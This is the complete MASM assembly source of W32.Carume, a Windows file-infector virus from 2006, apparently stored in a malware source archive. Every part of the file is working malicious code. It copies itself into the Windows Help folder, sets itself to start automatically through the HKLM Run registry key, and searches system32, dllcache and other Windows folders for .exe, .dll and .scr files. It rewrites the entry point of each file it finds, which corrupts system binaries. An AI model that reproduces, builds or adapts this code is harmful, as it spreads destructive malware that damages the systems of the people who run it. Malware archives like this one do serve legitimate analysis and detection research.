MalwareSourceCode/Win32/Infector/Win32.Carume.asm
2020-10-16 23:26:21 +02:00

382 lines
6.7 KiB
NASM

;
; W32.Carume
;
; Written by RadiatioN @ XERO VX and hacking group in February-March 2006
;
; THIS FILE HAS NO COPYRIGHTS! I AM NOT RESPONSIBLE FOR ANY DAMAGE WITH THAT CODE!
;
; Compile with masm 8.2
;
; greetings to vBx and SkyOut
;
; What does this Code?
; - Copy itself to %WINDIR%\Help\WinHelpCenter.exe
; - Adds a new registry entry for autostarting itself
; - Searches in
; %WINDIR%\ServicePackFiles\i386\
; %WINDIR%\
; %WINDIR%\system32\
; %WINDIR%\system32\dllcache\
; for file extension files like
; .exe
; .dll
; .scr
; to infect it
; - infecting file by changing the RVA entry point of the file
;
.386
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include kernel32.inc
include advapi32.inc
includelib user32.lib
includelib kernel32.lib
includelib advapi32.lib
.data
; Directories to infect
szDirectory db "\ServicePackFiles\i386\", 0, "\", 0, "\system32\", 0, "\system32\dllcache\", 0
dwDirPos dword 0
dwDirCount dword 0
;virus name
szVirName db "W32.Carume",0
; file extensions to find
szFileExtension db ".exe", 0, ".dll", 0, ".scr", 0
dwFileExPos dword 0
dwFileExCount dword 0
; Rest of variables
szWinDir db 260 dup(0)
szDirDest db 260 dup(0)
szWildcard db '*',0
szNewDir db "\Help\WinHelpCenter.exe",0
szKey db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0
szValueName db "WinHelpCenter",0
hSearch dword 0
dwRetVal dword 0
check dword 0
dwDamnStuff dword 0
dwStartOfPE dword 0
dwEntryPoint dword 0
dwCount dword 0
hKey dword 0
; WIN32_FIND_DATA structure
dwFileAttributes dword 0
;FILETIME structure
ftCreationTime dword 0
ftCreationTime2 dword 0
;FILETIME structure
ftLastAccessTime dword 0
ftLastAccessTime2 dword 0
;FILETIME structure
ftLastWriteTime dword 0
ftLastWriteTime2 dword 0
nFileSizeHigh dword 0
nFileSizeLow dword 0
dwReserved0 dword 0
dwReserved1 dword 0
cFileName db 260 dup(0)
cAlternateFileName db 14 dup(0)
.code
start:
;Copy File to %WINDIR%\Help\WinHelpCenter.exe
invoke GetWindowsDirectory, offset szWinDir, 260
push offset szDirDest
push offset szNewDir
push offset szWinDir
call StrCatDest
invoke GetCommandLine
push eax
call RemoveFirstLast
invoke CopyFile, eax, offset szDirDest, TRUE
invoke RegCreateKey, HKEY_LOCAL_MACHINE, offset szKey, offset hKey
invoke lstrlen, offset szDirDest
invoke RegSetValueEx, hKey, offset szValueName, 0, REG_SZ, offset szDirDest, eax
NextDir:
;go through directorys and infect the files
push offset dwDirPos
push offset szDirectory
call GetNextString
inc dwDirCount
mov esi, eax
push offset szDirDest
push esi
push offset szWinDir
call StrCatDest
push offset szDirDest
push offset szWildcard
push offset szDirDest
call StrCatDest
invoke FindFirstFile, offset szDirDest, offset dwFileAttributes
mov hSearch, eax
nextfile:
push offset dwFileExPos
push offset szFileExtension
call GetNextString
inc dwFileExCount
push eax
push offset cFileName
call InStr2
cmp eax, 1
je Infect
cmp dwFileExCount, 3
jne nextfile
jmp NoInfection
Infect:
push offset szDirDest
push esi
push offset szWinDir
call StrCatDest
push offset cFileName
push offset szDirDest
call StrCat
;File infection methods
;GENERIC_READ | GENERIC_WRITE
mov eax, 0C0000000h
;open file
invoke CreateFile, addr szDirDest, eax, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL
mov dwRetVal, eax
;read start of PE header and add value for entry point offset
invoke SetFilePointer, dwRetVal, 03Ch, NULL, FILE_BEGIN
invoke ReadFile, dwRetVal, offset dwStartOfPE, 4, offset dwDamnStuff, NULL
add dwStartOfPE, 028h
;read entry point and a value
invoke SetFilePointer, dwRetVal, dwStartOfPE, NULL, FILE_BEGIN
invoke ReadFile, dwRetVal, offset dwEntryPoint, 4, offset dwDamnStuff, NULL
add dwEntryPoint, 210h
;write new entry point
invoke SetFilePointer, dwRetVal, -4, NULL, FILE_CURRENT
invoke WriteFile, dwRetVal, offset dwEntryPoint, 4, offset dwDamnStuff, NULL
invoke CloseHandle, dwRetVal
NoInfection:
mov dwFileExPos, 0
mov dwFileExCount, 0
invoke FindNextFile, hSearch, offset dwFileAttributes
cmp eax, 0
jnz nextfile
cmp dwDirCount, 4
jne NextDir
invoke ExitProcess, 0
;nearly equal to the C-function InStr()
InStr2:
pop ebp
pop ecx
pop check
mov edx, check
InStrLoop:
mov al, [ecx]
mov bl, [edx]
cmp al, bl
jne InStrRestore
inc edx
mov bl, [edx]
cmp bl, 0
je InStrTrue
jmp InStrResume
InStrRestore:
mov edx, check
InStrResume:
cmp al,0
je InStrFalse
cmp bl,0
je InStrFalse
inc ecx
jmp InStrLoop
InStrFalse:
mov eax, 0
push ebp
ret
InStrTrue:
mov eax, 1
push ebp
ret
;nearly equal to the c-function StrCat()
StrCat:
pop ebp
pop ecx
pop edx
StrCatLoop:
mov al, [ecx]
inc ecx
cmp al, 0
jne StrCatLoop
dec ecx
StrCatLoop2:
mov bl, [edx]
mov [ecx], bl
inc ecx
inc edx
cmp bl,0
jne StrCatLoop2
push ebp
ret
;modified function of StrCat copys destination string in the 3. argument
StrCatDest:
pop ebp
pop ebx
pop ecx
pop edx
StrCatDestLoop:
mov al, [ebx]
mov [edx], al
inc ebx
inc edx
cmp al, 0
jne StrCatDestLoop
dec ebx
dec edx
StrCatDestLoop2:
mov bl, [ecx]
mov [edx], bl
inc ecx
inc edx
cmp bl,0
jne StrCatDestLoop2
push ebp
ret
;equal to the c-function strcpy()
StrCpy:
pop ebp
pop ebx
pop ecx
StrCpyLoop:
mov al, [ebx]
mov [ecx], al
inc ecx
inc ebx
cmp al, 0
jne StrCpyLoop
push ebp
ret
;gets the next string in an array
GetNextString:
pop ebp
pop ebx
pop ecx
add ebx, [ecx]
mov al, [ecx]
cmp al, 0
jnz GetNextStringLoop
inc BYTE PTR [ecx]
mov eax, ebx
push ebp
ret
GetNextStringLoop:
mov al, [ebx]
inc ebx
inc BYTE PTR [ecx]
cmp al, 0
jnz GetNextStringLoop
push ebp
mov eax, ebx
ret
;removes the first and the last character of a string
RemoveFirstLast:
pop ebp
pop ebx
inc ebx
RemoveFirstLastLoop:
mov dl, [ebx]
dec ebx
mov [ebx], dl
inc ebx
inc ebx
cmp dl,0
jnz RemoveFirstLastLoop
dec ebx
dec ebx
dec ebx
dec ebx
xor dl, dl
mov [ebx], dl
push ebp
ret
end start